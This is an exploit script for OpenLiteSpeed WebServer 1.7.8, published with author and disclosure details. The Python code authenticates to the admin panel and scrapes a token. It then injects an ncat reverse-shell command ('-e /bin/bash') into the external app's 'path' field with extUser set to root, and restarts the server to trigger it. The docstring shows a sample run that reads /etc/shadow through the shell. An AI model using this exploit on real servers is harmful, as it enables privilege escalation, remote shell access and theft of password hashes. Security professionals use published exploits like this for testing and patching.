Openlitespeed WebServer 1.7.8 Command Injection

`# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)  
# Date: 26/1/2021  
# Exploit Author: Metin Yunus Kandemir  
# Discovered by: cmOs - SunCSR  
# Vendor Homepage: https://openlitespeed.org/  
# Software Link: https://openlitespeed.org/kb/install-from-binary/  
# Version: 1.7.8  
  
import requests  
import sys  
import urllib3  
from bs4 import BeautifulSoup  
  
"""  
Description:  
The "path" parameter has command injection vulnerability that leads to escalate privilege.  
OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and  
extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc.  
Details: https://github.com/litespeedtech/openlitespeed/issues/217  
Example:  
Step-1:  
ubuntu@ubuntu:~$ cat /etc/shadow  
cat: /etc/shadow: Permission denied  
Step-2:  
ubuntu@ubuntu:~$ nc -nvlp 4444  
Listening on [0.0.0.0] (family 0, port 4444)  
Step-3:  
ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow  
[+] Authentication was successful!  
[+] Version is detected: OpenLiteSpeed 1.7.8  
[+] The target is vulnerable!  
[+] tk value is obtained: 0.98296300 1612966522  
[+] Sending reverse shell to 127.0.0.1:4444 ...  
[+] Triggering command execution...  
Step-4:  
ubuntu@ubuntu:~$ nc -nvlp 4444  
Listening on [0.0.0.0] (family 0, port 4444)  
Connection from 127.0.0.1 54534 received!  
cat /etc/shadow  
root:!:18620:0:99999:7:::  
daemon:*:17937:0:99999:7:::  
bin:*:17937:0:99999:7:::  
sys:*:17937:0:99999:7:::  
sync:*:17937:0:99999:7:::  
.  
.  
.  
"""  
  
def triggerCommandExec(target, s):  
data = {"act" : "restart"}  
trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False)  
if trigger.status_code == 200:  
print("[+] Triggering command execution...")  
else:  
print("[-] Someting went wrong!")  
  
def commandExec(tk, groupId, s, target):  
data = {  
"name" : "lsphp",  
"address" : "uds://tmp/lshttpd/lsphp.sock",  
"note" : "",  
"maxConns" : "10",  
"env" : "PHP_LSAPI_CHILDREN=10",  
"initTimeout" : "60",  
"retryTimeout" : "0",  
"persistConn" : "1",  
"pcKeepAliveTimeout" : "",  
"respBuffer" : "0",  
"autoStart" : "2",  
"path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash",  
"backlog" : "100",  
"instances" : "1",  
"extUser" : "root",  
"extGroup" : groupId ,  
"umask" : "",  
"runOnStartUp" : "1",  
"extMaxIdleTime" : "",  
"priority" : "0",  
"memSoftLimit" : "2047M",  
"memHardLimit" : "2047M",  
"procSoftLimit" : "1400",  
"procHardLimit" : "",  
"a" : "s",  
"m" : "serv",  
"p" : "ext",  
"t" : "A_EXT_LSAPI",  
"r" : "lsphp",  
"tk" : tk  
}  
exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False)  
  
if exec.status_code == 200:  
if exec.text == "Illegal entry point!":  
print("[-] tk value is incorrect!")  
sys.exit(1)  
else:  
print("[+] Sending reverse shell to 127.0.0.1:4444 ...")  
else:  
print("[-] Something went wrong!")  
sys.exit(1)  
  
triggerCommandExec(target, s)  
  
def loginReq(target, username, password, groupId):  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
s = requests.Session()  
data = {"userid" : username , "pass" : password }  
login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False)  
  
if login.status_code == 302:  
print("[+] Authentication was successful!")  
elif login.status_code == 200:  
print("[-] Authentication was unsuccessful!")  
sys.exit(1)  
else:  
print("[-] Connection error!")  
sys.exit(1)  
  
version = s.get("https://" + target + "/index.php")  
versionSource = BeautifulSoup(version.text, "html.parser")  
v = versionSource.find('div', {'class':'project-context hidden-xs'}).text  
print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2]))  
if v.split()[2] == "1.7.8":  
print("[+] The target is vulnerable!")  
  
#getting tk value  
getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext")  
source = BeautifulSoup(getTk.text, 'html.parser')  
tk = source.find('input', {'name':'tk'}).get('value')  
print("[+] tk value is obtained: "+tk)  
commandExec(tk, groupId, s, target)  
  
def main(args):  
if len(args) != 5:  
print("usage: %s targetIp:port username password groupId " %(args[0]))  
print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow")  
sys.exit(1)  
loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4])  
  
if __name__ == "__main__":  
main(args=sys.argv)  
  
`